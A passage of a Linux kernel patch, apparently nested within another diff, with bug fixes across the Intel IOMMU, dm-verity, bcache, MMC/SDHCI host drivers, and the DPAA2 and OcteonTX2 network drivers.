+@@ -2513,7 +2505,7 @@ static int domain_add_dev_info(struct dmar_domain *domain, struct device *dev)
+ 					dev, PASID_RID2PASID);
+ 		if (ret) {
+ 			dev_err(dev, "Setup RID2PASID failed\n");
+-			dmar_remove_one_dev_info(dev);
++			device_block_translation(dev);
+ 			return ret;
+ 		}
+ 	}
+@@ -2521,10 +2513,13 @@ static int domain_add_dev_info(struct dmar_domain *domain, struct device *dev)
+ 	ret = domain_context_mapping(domain, dev);
+ 	if (ret) {
+ 		dev_err(dev, "Domain context map failed\n");
+-		dmar_remove_one_dev_info(dev);
++		device_block_translation(dev);
+ 		return ret;
+ 	}
+ 
++	if (sm_supported(info->iommu) || !domain_type_is_si(info->domain))
++		iommu_enable_pci_caps(info);
++
+ 	return 0;
+ }
+ 
+@@ -4091,8 +4086,8 @@ static int domain_context_clear_one_cb(struct pci_dev *pdev, u16 alias, void *op
+  */
+ static void domain_context_clear(struct device_domain_info *info)
+ {
+-	if (!info->iommu || !info->dev || !dev_is_pci(info->dev))
+-		return;
++	if (!dev_is_pci(info->dev))
++		domain_context_clear_one(info, info->bus, info->devfn);
+ 
+ 	pci_for_each_dma_alias(to_pci_dev(info->dev),
+ 			       &domain_context_clear_one_cb, info);
+@@ -4112,7 +4107,6 @@ static void dmar_remove_one_dev_info(struct device *dev)
+ 
+ 		iommu_disable_dev_iotlb(info);
+ 		domain_context_clear(info);
+-		intel_pasid_free_table(info->dev);
+ 	}
+ 
+ 	spin_lock_irqsave(&domain->lock, flags);
+@@ -4123,6 +4117,37 @@ static void dmar_remove_one_dev_info(struct device *dev)
+ 	info->domain = NULL;
+ }
+ 
++/*
++ * Clear the page table pointer in context or pasid table entries so that
++ * all DMA requests without PASID from the device are blocked. If the page
++ * table has been set, clean up the data structures.
++ */
++static void device_block_translation(struct device *dev)
++{
++	struct device_domain_info *info = dev_iommu_priv_get(dev);
++	struct intel_iommu *iommu = info->iommu;
++	unsigned long flags;
++
++	iommu_disable_dev_iotlb(info);
++	if (!dev_is_real_dma_subdevice(dev)) {
++		if (sm_supported(iommu))
++			intel_pasid_tear_down_entry(iommu, dev,
++						    PASID_RID2PASID, false);
++		else
++			domain_context_clear(info);
++	}
++
++	if (!info->domain)
++		return;
++
++	spin_lock_irqsave(&info->domain->lock, flags);
++	list_del(&info->link);
++	spin_unlock_irqrestore(&info->domain->lock, flags);
++
++	domain_detach_iommu(info->domain, iommu);
++	info->domain = NULL;
++}
++
+ static int md_domain_init(struct dmar_domain *domain, int guest_width)
+ {
+ 	int adjust_width;
+@@ -4246,7 +4271,7 @@ static int intel_iommu_attach_device(struct iommu_domain *domain,
+ 		struct device_domain_info *info = dev_iommu_priv_get(dev);
+ 
+ 		if (info->domain)
+-			dmar_remove_one_dev_info(dev);
++			device_block_translation(dev);
+ 	}
+ 
+ 	ret = prepare_domain_attach_device(domain, dev);
+@@ -4477,6 +4502,7 @@ static struct iommu_device *intel_iommu_probe_device(struct device *dev)
+ 	struct device_domain_info *info;
+ 	struct intel_iommu *iommu;
+ 	u8 bus, devfn;
++	int ret;
+ 
+ 	iommu = device_to_iommu(dev, &bus, &devfn);
+ 	if (!iommu || !iommu->iommu.ops)
+@@ -4521,6 +4547,16 @@ static struct iommu_device *intel_iommu_probe_device(struct device *dev)
+ 
+ 	dev_iommu_priv_set(dev, info);
+ 
++	if (sm_supported(iommu) && !dev_is_real_dma_subdevice(dev)) {
++		ret = intel_pasid_alloc_table(dev);
++		if (ret) {
++			dev_err(dev, "PASID table allocation failed\n");
++			dev_iommu_priv_set(dev, NULL);
++			kfree(info);
++			return ERR_PTR(ret);
++		}
++	}
++
+ 	return &iommu->iommu;
+ }
+ 
+@@ -4529,6 +4565,7 @@ static void intel_iommu_release_device(struct device *dev)
+ 	struct device_domain_info *info = dev_iommu_priv_get(dev);
+ 
+ 	dmar_remove_one_dev_info(dev);
++	intel_pasid_free_table(dev);
+ 	dev_iommu_priv_set(dev, NULL);
+ 	kfree(info);
+ 	set_dma_ops(dev, NULL);
+@@ -4872,7 +4909,7 @@ static void quirk_igfx_skip_te_disable(struct pci_dev *dev)
+ 	ver = (dev->device >> 8) & 0xff;
+ 	if (ver != 0x45 && ver != 0x46 && ver != 0x4c &&
+ 	    ver != 0x4e && ver != 0x8a && ver != 0x98 &&
+-	    ver != 0x9a && ver != 0xa7)
++	    ver != 0x9a && ver != 0xa7 && ver != 0x7d)
+ 		return;
+ 
+ 	if (risky_device(dev))
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 4d3595d6d1c40..05e3157fc7b4e 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -1489,7 +1489,7 @@ out_nocoalesce:
+ 	bch_keylist_free(&keylist);
+ 
+ 	for (i = 0; i < nodes; i++)
+-		if (!IS_ERR(new_nodes[i])) {
++		if (!IS_ERR_OR_NULL(new_nodes[i])) {
+ 			btree_node_free(new_nodes[i]);
+ 			rw_unlock(true, new_nodes[i]);
+ 		}
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 9eb03bb224698..0304e36af329c 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -24,7 +24,8 @@ bool verity_fec_is_enabled(struct dm_verity *v)
+  */
+ static inline struct dm_verity_fec_io *fec_io(struct dm_verity_io *io)
+ {
+-	return (struct dm_verity_fec_io *) verity_io_digest_end(io->v, io);
++	return (struct dm_verity_fec_io *)
++		((char *)io + io->v->ti->per_io_data_size - sizeof(struct dm_verity_fec_io));
+ }
+ 
+ /*
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index b86d41219ba9c..24df610a2c438 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -631,7 +631,6 @@ static void verity_work(struct work_struct *w)
+ 
+ 	io->in_tasklet = false;
+ 
+-	verity_fec_init_io(io);
+ 	verity_finish_io(io, errno_to_blk_status(verity_verify_io(io)));
+ }
+ 
+@@ -657,7 +656,9 @@ static void verity_end_io(struct bio *bio)
+ 	struct dm_verity_io *io = bio->bi_private;
+ 
+ 	if (bio->bi_status &&
+-	    (!verity_fec_is_enabled(io->v) || verity_is_system_shutting_down())) {
++	    (!verity_fec_is_enabled(io->v) ||
++	     verity_is_system_shutting_down() ||
++	     (bio->bi_opf & REQ_RAHEAD))) {
+ 		verity_finish_io(io, bio->bi_status);
+ 		return;
+ 	}
+@@ -779,6 +780,8 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+ 	bio->bi_private = io;
+ 	io->iter = bio->bi_iter;
+ 
++	verity_fec_init_io(io);
++
+ 	verity_submit_prefetch(v, io);
+ 
+ 	submit_bio_noacct(bio);
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index f96f4e281ee4a..f9d522c870e61 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -115,12 +115,6 @@ static inline u8 *verity_io_want_digest(struct dm_verity *v,
+ 	return (u8 *)(io + 1) + v->ahash_reqsize + v->digest_size;
+ }
+ 
+-static inline u8 *verity_io_digest_end(struct dm_verity *v,
+-				       struct dm_verity_io *io)
+-{
+-	return verity_io_want_digest(v, io) + v->digest_size;
+-}
+-
+ extern int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 			       struct bvec_iter *iter,
+ 			       int (*process)(struct dm_verity *v,
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 67a7ae9b997aa..770490234c872 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -1505,6 +1505,8 @@ static void mmc_blk_cqe_complete_rq(struct mmc_queue *mq, struct request *req)
+ 			blk_mq_requeue_request(req, true);
+ 		else
+ 			__blk_mq_end_request(req, BLK_STS_OK);
++	} else if (mq->in_recovery) {
++		blk_mq_requeue_request(req, true);
+ 	} else {
+ 		blk_mq_end_request(req, BLK_STS_OK);
+ 	}
+diff --git a/drivers/mmc/core/core.c b/drivers/mmc/core/core.c
+index de1cc9e1ae576..df85c35a86a3b 100644
+--- a/drivers/mmc/core/core.c
++++ b/drivers/mmc/core/core.c
+@@ -552,7 +552,9 @@ int mmc_cqe_recovery(struct mmc_host *host)
+ 	cmd.flags        = MMC_RSP_R1B | MMC_CMD_AC;
+ 	cmd.flags       &= ~MMC_RSP_CRC; /* Ignore CRC */
+ 	cmd.busy_timeout = MMC_CQE_RECOVERY_TIMEOUT;
+-	mmc_wait_for_cmd(host, &cmd, 0);
++	mmc_wait_for_cmd(host, &cmd, MMC_CMD_RETRIES);
++
++	mmc_poll_for_busy(host->card, MMC_CQE_RECOVERY_TIMEOUT, true, MMC_BUSY_IO);
+ 
+ 	memset(&cmd, 0, sizeof(cmd));
+ 	cmd.opcode       = MMC_CMDQ_TASK_MGMT;
+@@ -560,10 +562,13 @@ int mmc_cqe_recovery(struct mmc_host *host)
+ 	cmd.flags        = MMC_RSP_R1B | MMC_CMD_AC;
+ 	cmd.flags       &= ~MMC_RSP_CRC; /* Ignore CRC */
+ 	cmd.busy_timeout = MMC_CQE_RECOVERY_TIMEOUT;
+-	err = mmc_wait_for_cmd(host, &cmd, 0);
++	err = mmc_wait_for_cmd(host, &cmd, MMC_CMD_RETRIES);
+ 
+ 	host->cqe_ops->cqe_recovery_finish(host);
+ 
++	if (err)
++		err = mmc_wait_for_cmd(host, &cmd, MMC_CMD_RETRIES);
++
+ 	mmc_retune_release(host);
+ 
+ 	return err;
+diff --git a/drivers/mmc/core/regulator.c b/drivers/mmc/core/regulator.c
+index 609201a467ef9..4dcbc2281d2b5 100644
+--- a/drivers/mmc/core/regulator.c
++++ b/drivers/mmc/core/regulator.c
+@@ -271,3 +271,44 @@ int mmc_regulator_get_supply(struct mmc_host *mmc)
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(mmc_regulator_get_supply);
++
++/**
++ * mmc_regulator_enable_vqmmc - enable VQMMC regulator for a host
++ * @mmc: the host to regulate
++ *
++ * Returns 0 or errno. Enables the regulator for vqmmc.
++ * Keeps track of the enable status for ensuring that calls to
++ * regulator_enable/disable are balanced.
++ */
++int mmc_regulator_enable_vqmmc(struct mmc_host *mmc)
++{
++	int ret = 0;
++
++	if (!IS_ERR(mmc->supply.vqmmc) && !mmc->vqmmc_enabled) {
++		ret = regulator_enable(mmc->supply.vqmmc);
++		if (ret < 0)
++			dev_err(mmc_dev(mmc), "enabling vqmmc regulator failed\n");
++		else
++			mmc->vqmmc_enabled = true;
++	}
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(mmc_regulator_enable_vqmmc);
++
++/**
++ * mmc_regulator_disable_vqmmc - disable VQMMC regulator for a host
++ * @mmc: the host to regulate
++ *
++ * Returns 0 or errno. Disables the regulator for vqmmc.
++ * Keeps track of the enable status for ensuring that calls to
++ * regulator_enable/disable are balanced.
++ */
++void mmc_regulator_disable_vqmmc(struct mmc_host *mmc)
++{
++	if (!IS_ERR(mmc->supply.vqmmc) && mmc->vqmmc_enabled) {
++		regulator_disable(mmc->supply.vqmmc);
++		mmc->vqmmc_enabled = false;
++	}
++}
++EXPORT_SYMBOL_GPL(mmc_regulator_disable_vqmmc);
+diff --git a/drivers/mmc/host/cqhci-core.c b/drivers/mmc/host/cqhci-core.c
+index b3d7d6d8d6548..41e94cd141098 100644
+--- a/drivers/mmc/host/cqhci-core.c
++++ b/drivers/mmc/host/cqhci-core.c
+@@ -942,8 +942,8 @@ static bool cqhci_clear_all_tasks(struct mmc_host *mmc, unsigned int timeout)
+ 	ret = cqhci_tasks_cleared(cq_host);
+ 
+ 	if (!ret)
+-		pr_debug("%s: cqhci: Failed to clear tasks\n",
+-			 mmc_hostname(mmc));
++		pr_warn("%s: cqhci: Failed to clear tasks\n",
++			mmc_hostname(mmc));
+ 
+ 	return ret;
+ }
+@@ -976,7 +976,7 @@ static bool cqhci_halt(struct mmc_host *mmc, unsigned int timeout)
+ 	ret = cqhci_halted(cq_host);
+ 
+ 	if (!ret)
+-		pr_debug("%s: cqhci: Failed to halt\n", mmc_hostname(mmc));
++		pr_warn("%s: cqhci: Failed to halt\n", mmc_hostname(mmc));
+ 
+ 	return ret;
+ }
+@@ -984,10 +984,10 @@ static bool cqhci_halt(struct mmc_host *mmc, unsigned int timeout)
+ /*
+  * After halting we expect to be able to use the command line. We interpret the
+  * failure to halt to mean the data lines might still be in use (and the upper
+- * layers will need to send a STOP command), so we set the timeout based on a
+- * generous command timeout.
++ * layers will need to send a STOP command), however failing to halt complicates
++ * the recovery, so set a timeout that would reasonably allow I/O to complete.
+  */
+-#define CQHCI_START_HALT_TIMEOUT	5
++#define CQHCI_START_HALT_TIMEOUT	500
+ 
+ static void cqhci_recovery_start(struct mmc_host *mmc)
+ {
+@@ -1075,28 +1075,28 @@ static void cqhci_recovery_finish(struct mmc_host *mmc)
+ 
+ 	ok = cqhci_halt(mmc, CQHCI_FINISH_HALT_TIMEOUT);
+ 
+-	if (!cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT))
+-		ok = false;
+-
+ 	/*
+ 	 * The specification contradicts itself, by saying that tasks cannot be
+ 	 * cleared if CQHCI does not halt, but if CQHCI does not halt, it should
+ 	 * be disabled/re-enabled, but not to disable before clearing tasks.
+ 	 * Have a go anyway.
+ 	 */
+-	if (!ok) {
+-		pr_debug("%s: cqhci: disable / re-enable\n", mmc_hostname(mmc));
+-		cqcfg = cqhci_readl(cq_host, CQHCI_CFG);
+-		cqcfg &= ~CQHCI_ENABLE;
+-		cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
+-		cqcfg |= CQHCI_ENABLE;
+-		cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
+-		/* Be sure that there are no tasks */
+-		ok = cqhci_halt(mmc, CQHCI_FINISH_HALT_TIMEOUT);
+-		if (!cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT))
+-			ok = false;
+-		WARN_ON(!ok);
+-	}
++	if (!cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT))
++		ok = false;
++
++	/* Disable to make sure tasks really are cleared */
++	cqcfg = cqhci_readl(cq_host, CQHCI_CFG);
++	cqcfg &= ~CQHCI_ENABLE;
++	cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
++
++	cqcfg = cqhci_readl(cq_host, CQHCI_CFG);
++	cqcfg |= CQHCI_ENABLE;
++	cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
++
++	cqhci_halt(mmc, CQHCI_FINISH_HALT_TIMEOUT);
++
++	if (!ok)
++		cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT);
+ 
+ 	cqhci_recover_mrqs(cq_host);
+ 
+diff --git a/drivers/mmc/host/sdhci-pci-gli.c b/drivers/mmc/host/sdhci-pci-gli.c
+index 33d7039c19169..3b5b5c139206d 100644
+--- a/drivers/mmc/host/sdhci-pci-gli.c
++++ b/drivers/mmc/host/sdhci-pci-gli.c
+@@ -801,6 +801,32 @@ static void gl9763e_hs400_enhanced_strobe(struct mmc_host *mmc,
+ 	sdhci_writel(host, val, SDHCI_GLI_9763E_HS400_ES_REG);
+ }
+ 
++static void gl9763e_set_low_power_negotiation(struct sdhci_pci_slot *slot,
++					      bool enable)
++{
++	struct pci_dev *pdev = slot->chip->pdev;
++	u32 value;
++
++	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
++	value &= ~GLI_9763E_VHS_REV;
++	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_W);
++	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
++
++	pci_read_config_dword(pdev, PCIE_GLI_9763E_CFG, &value);
++
++	if (enable)
++		value &= ~GLI_9763E_CFG_LPSN_DIS;
++	else
++		value |= GLI_9763E_CFG_LPSN_DIS;
++
++	pci_write_config_dword(pdev, PCIE_GLI_9763E_CFG, value);
++
++	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
++	value &= ~GLI_9763E_VHS_REV;
++	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_R);
++	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
++}
++
+ static void sdhci_set_gl9763e_signaling(struct sdhci_host *host,
+ 					unsigned int timing)
+ {
+@@ -909,6 +935,9 @@ static int gl9763e_add_host(struct sdhci_pci_slot *slot)
+ 	if (ret)
+ 		goto cleanup;
+ 
++	/* Disable LPM negotiation to avoid entering L1 state. */
++	gl9763e_set_low_power_negotiation(slot, false);
++
+ 	return 0;
+ 
+ cleanup:
+@@ -960,31 +989,6 @@ static void gli_set_gl9763e(struct sdhci_pci_slot *slot)
+ }
+ 
+ #ifdef CONFIG_PM
+-static void gl9763e_set_low_power_negotiation(struct sdhci_pci_slot *slot, bool enable)
+-{
+-	struct pci_dev *pdev = slot->chip->pdev;
+-	u32 value;
+-
+-	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
+-	value &= ~GLI_9763E_VHS_REV;
+-	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_W);
+-	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
+-
+-	pci_read_config_dword(pdev, PCIE_GLI_9763E_CFG, &value);
+-
+-	if (enable)
+-		value &= ~GLI_9763E_CFG_LPSN_DIS;
+-	else
+-		value |= GLI_9763E_CFG_LPSN_DIS;
+-
+-	pci_write_config_dword(pdev, PCIE_GLI_9763E_CFG, value);
+-
+-	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
+-	value &= ~GLI_9763E_VHS_REV;
+-	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_R);
+-	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
+-}
+-
+ static int gl9763e_runtime_suspend(struct sdhci_pci_chip *chip)
+ {
+ 	struct sdhci_pci_slot *slot = chip->slots[0];
+diff --git a/drivers/mmc/host/sdhci-sprd.c b/drivers/mmc/host/sdhci-sprd.c
+index 525f979e2a974..2101b6e794c0e 100644
+--- a/drivers/mmc/host/sdhci-sprd.c
++++ b/drivers/mmc/host/sdhci-sprd.c
+@@ -405,12 +405,33 @@ static void sdhci_sprd_request_done(struct sdhci_host *host,
+ 	mmc_request_done(host->mmc, mrq);
+ }
+ 
++static void sdhci_sprd_set_power(struct sdhci_host *host, unsigned char mode,
++				 unsigned short vdd)
++{
++	struct mmc_host *mmc = host->mmc;
++
++	switch (mode) {
++	case MMC_POWER_OFF:
++		mmc_regulator_set_ocr(host->mmc, mmc->supply.vmmc, 0);
++
++		mmc_regulator_disable_vqmmc(mmc);
++		break;
++	case MMC_POWER_ON:
++		mmc_regulator_enable_vqmmc(mmc);
++		break;
++	case MMC_POWER_UP:
++		mmc_regulator_set_ocr(host->mmc, mmc->supply.vmmc, vdd);
++		break;
++	}
++}
++
+ static struct sdhci_ops sdhci_sprd_ops = {
+ 	.read_l = sdhci_sprd_readl,
+ 	.write_l = sdhci_sprd_writel,
+ 	.write_w = sdhci_sprd_writew,
+ 	.write_b = sdhci_sprd_writeb,
+ 	.set_clock = sdhci_sprd_set_clock,
++	.set_power = sdhci_sprd_set_power,
+ 	.get_max_clock = sdhci_sprd_get_max_clock,
+ 	.get_min_clock = sdhci_sprd_get_min_clock,
+ 	.set_bus_width = sdhci_set_bus_width,
+@@ -676,6 +697,10 @@ static int sdhci_sprd_probe(struct platform_device *pdev)
+ 	host->caps1 &= ~(SDHCI_SUPPORT_SDR50 | SDHCI_SUPPORT_SDR104 |
+ 			 SDHCI_SUPPORT_DDR50);
+ 
++	ret = mmc_regulator_get_supply(host->mmc);
++	if (ret)
++		goto pm_runtime_disable;
++
+ 	ret = sdhci_setup_host(host);
+ 	if (ret)
+ 		goto pm_runtime_disable;
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index 6383d9805dac9..b58162ce81d87 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -1043,14 +1043,12 @@ static int dpaa2_eth_build_single_fd(struct dpaa2_eth_priv *priv,
+ 	dma_addr_t addr;
+ 
+ 	buffer_start = skb->data - dpaa2_eth_needed_headroom(skb);
+-
+-	/* If there's enough room to align the FD address, do it.
+-	 * It will help hardware optimize accesses.
+-	 */
+ 	aligned_start = PTR_ALIGN(buffer_start - DPAA2_ETH_TX_BUF_ALIGN,
+ 				  DPAA2_ETH_TX_BUF_ALIGN);
+ 	if (aligned_start >= skb->head)
+ 		buffer_start = aligned_start;
++	else
++		return -ENOMEM;
+ 
+ 	/* Store a backpointer to the skb at the beginning of the buffer
+ 	 * (in the private data area) such that we can release it
+@@ -4738,6 +4736,8 @@ static int dpaa2_eth_probe(struct fsl_mc_device *dpni_dev)
+ 	if (err)
+ 		goto err_dl_port_add;
+ 
++	net_dev->needed_headroom = DPAA2_ETH_SWA_SIZE + DPAA2_ETH_TX_BUF_ALIGN;
++
+ 	err = register_netdev(net_dev);
+ 	if (err < 0) {
+ 		dev_err(dev, "register_netdev() failed\n");
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h
+index 447718483ef47..e703846adc9f0 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h
+@@ -702,7 +702,7 @@ static inline bool dpaa2_eth_rx_pause_enabled(u64 link_options)
+ 
+ static inline unsigned int dpaa2_eth_needed_headroom(struct sk_buff *skb)
+ {
+-	unsigned int headroom = DPAA2_ETH_SWA_SIZE;
++	unsigned int headroom = DPAA2_ETH_SWA_SIZE + DPAA2_ETH_TX_BUF_ALIGN;
+ 
+ 	/* If we don't have an skb (e.g. XDP buffer), we only need space for
+ 	 * the software annotation area
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index 11eeb36cf9a54..a0c31f5b2ce05 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -232,7 +232,7 @@ M(NPC_GET_KEX_CFG,	  0x600c, npc_get_kex_cfg,			\
+ M(NPC_INSTALL_FLOW,	  0x600d, npc_install_flow,			       \
+ 				  npc_install_flow_req, npc_install_flow_rsp)  \
+ M(NPC_DELETE_FLOW,	  0x600e, npc_delete_flow,			\
+-				  npc_delete_flow_req, msg_rsp)		\
++				  npc_delete_flow_req, npc_delete_flow_rsp)		\
+ M(NPC_MCAM_READ_ENTRY,	  0x600f, npc_mcam_read_entry,			\
+ 				  npc_mcam_read_entry_req,		\
+ 				  npc_mcam_read_entry_rsp)		\
+@@ -1471,6 +1471,8 @@ struct npc_install_flow_req {
+ 	u8  vtag0_op;
+ 	u16 vtag1_def;
+ 	u8  vtag1_op;
++	/* old counter value */
++	u16 cntr_val;
+ };
+ 
+ struct npc_install_flow_rsp {
+@@ -1486,6 +1488,11 @@ struct npc_delete_flow_req {
+ 	u8 all; /* PF + VFs */
+ };
+ 
++struct npc_delete_flow_rsp {
++	struct mbox_msghdr hdr;
++	u16 cntr_val;
++};
++
+ struct npc_mcam_read_entry_req {
+ 	struct mbox_msghdr hdr;
+ 	u16 entry;	 /* MCAM entry to read */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 1f3a8cf42765e..7310047136986 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -5236,6 +5236,8 @@ int rvu_mbox_handler_nix_bandprof_free(struct rvu *rvu,
+ 
+ 		ipolicer = &nix_hw->ipolicer[layer];
+ 		for (idx = 0; idx < req->prof_count[layer]; idx++) {
++			if (idx == MAX_BANDPROF_PER_PFFUNC)
++				break;
+ 			prof_idx = req->prof_idx[layer][idx];
+ 			if (prof_idx >= ipolicer->band_prof.max ||
+ 			    ipolicer->pfvf_map[prof_idx] != pcifunc)
+@@ -5249,8 +5251,6 @@ int rvu_mbox_handler_nix_bandprof_free(struct rvu *rvu,
+ 			ipolicer->pfvf_map[prof_idx] = 0x00;
+ 			ipolicer->match_id[prof_idx] = 0;
+ 			rvu_free_rsrc(&ipolicer->band_prof, prof_idx);
+-			if (idx == MAX_BANDPROF_PER_PFFUNC)
+-				break;
+ 		}
+ 	}
+ 	mutex_unlock(&rvu->rsrc_lock);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+index 1eb5eb29a2ba6..80d6aa3f14c11 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+@@ -1184,7 +1184,7 @@ find_rule:
+ 	write_req.enable_entry = (u8)enable;
+ 	/* if counter is available then clear and use it */
+ 	if (req->set_cntr && rule->has_cntr) {
+-		rvu_write64(rvu, blkaddr, NPC_AF_MATCH_STATX(rule->cntr), 0x00);
++		rvu_write64(rvu, blkaddr, NPC_AF_MATCH_STATX(rule->cntr), req->cntr_val);
+ 		write_req.set_cntr = 1;
+ 		write_req.cntr = rule->cntr;
+ 	}
+@@ -1399,12 +1399,13 @@ static int npc_delete_flow(struct rvu *rvu, struct rvu_npc_mcam_rule *rule,
+ 
+ int rvu_mbox_handler_npc_delete_flow(struct rvu *rvu,
+ 				     struct npc_delete_flow_req *req,
+-				     struct msg_rsp *rsp)
++				     struct npc_delete_flow_rsp *rsp)
+ {
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+ 	struct rvu_npc_mcam_rule *iter, *tmp;
+ 	u16 pcifunc = req->hdr.pcifunc;
+ 	struct list_head del_list;
++	int blkaddr;
+ 
+ 	INIT_LIST_HEAD(&del_list);
+ 
+@@ -1420,6 +1421,10 @@ int rvu_mbox_handler_npc_delete_flow(struct rvu *rvu,
+ 				list_move_tail(&iter->list, &del_list);
+ 			/* single rule */
+ 			} else if (req->entry == iter->entry) {
++				blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
++				if (blkaddr)
++					rsp->cntr_val = rvu_read64(rvu, blkaddr,
++								   NPC_AF_MATCH_STATX(iter->cntr));
+ 				list_move_tail(&iter->list, &del_list);
+ 				break;
+ 			}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c
+index 3392487f6b47b..329b5a02914d7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c
+@@ -145,6 +145,7 @@ void rvu_switch_enable(struct rvu *rvu)
+ 	struct npc_mcam_alloc_entry_req alloc_req = { 0 };
+ 	struct npc_mcam_alloc_entry_rsp alloc_rsp = { 0 };
+ 	struct npc_delete_flow_req uninstall_req = { 0 };
++	struct npc_delete_flow_rsp uninstall_rsp = { 0 };
+ 	struct npc_mcam_free_entry_req free_req = { 0 };
+ 	struct rvu_switch *rswitch = &rvu->rswitch;
+ 	struct msg_rsp rsp;
+@@ -184,7 +185,7 @@ void rvu_switch_enable(struct rvu *rvu)
+ uninstall_rules:
+ 	uninstall_req.start = rswitch->start_entry;
+ 	uninstall_req.end =  rswitch->start_entry + rswitch->used_entries - 1;
+-	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &rsp);
++	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &uninstall_rsp);
+ 	kfree(rswitch->entry2pcifunc);
+ free_entries:
+ 	free_req.all = 1;
+@@ -196,6 +197,7 @@ exit:
+ void rvu_switch_disable(struct rvu *rvu)
+ {
+ 	struct npc_delete_flow_req uninstall_req = { 0 };
++	struct npc_delete_flow_rsp uninstall_rsp = { 0 };
+ 	struct npc_mcam_free_entry_req free_req = { 0 };
+ 	struct rvu_switch *rswitch = &rvu->rswitch;
+ 	struct rvu_hwinfo *hw = rvu->hw;
+@@ -232,7 +234,7 @@ void rvu_switch_disable(struct rvu *rvu)
+ 	uninstall_req.start = rswitch->start_entry;
+ 	uninstall_req.end =  rswitch->start_entry + rswitch->used_entries - 1;
+ 	free_req.all = 1;
+-	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &rsp);
++	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &uninstall_rsp);
+ 	rvu_mbox_handler_npc_mcam_free_entry(rvu, &free_req, &rsp);
+ 	rswitch->used_entries = 0;
+ 	kfree(rswitch->entry2pcifunc);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c
+index 826f691de2595..59d8d1ba15c28 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c
+@@ -448,6 +448,9 @@ int cn10k_set_ipolicer_rate(struct otx2_nic *pfvf, u16 profile,
+ 	aq->prof.pebs_mantissa = 0;
+ 	aq->prof_mask.pebs_mantissa = 0xFF;
+ 
++	aq->prof.hl_en = 0;
++	aq->prof_mask.hl_en = 1;
++
+ 	/* Fill AQ info */
